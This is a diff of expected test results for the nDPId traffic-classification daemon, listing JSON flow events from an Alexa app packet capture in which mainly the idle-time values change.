+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976082723,"flow_last_seen":1490976084872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5020,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1490976090572,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12466,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976100811,"flow_last_seen":1490976107676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7423,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976082723,"flow_last_seen":1490976084872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5020,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1490976090572,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12466,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976100811,"flow_last_seen":1490976107676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7423,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976027567,"flow_last_seen":1490976028006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1437,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976027567,"flow_last_seen":1490976028006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1437,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00577{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","packets-captured":3435,"packets-processed":3406,"total-skipped-flows":0,"total-l4-data-len":1226087,"total-not-detected-flows":0,"total-guessed-flows":14,"total-detected-flows":146,"total-detection-updates":141,"total-updates":0,"current-active-flows":0,"total-active-flows":160,"total-idle-flows":160,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1073,"global_ts_msec":1490976198776} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/amqp.pcap.out b/test/results/amqp.pcap.out index 2085e365f..58077cd3b 100644 --- a/test/results/amqp.pcap.out +++ b/test/results/amqp.pcap.out 
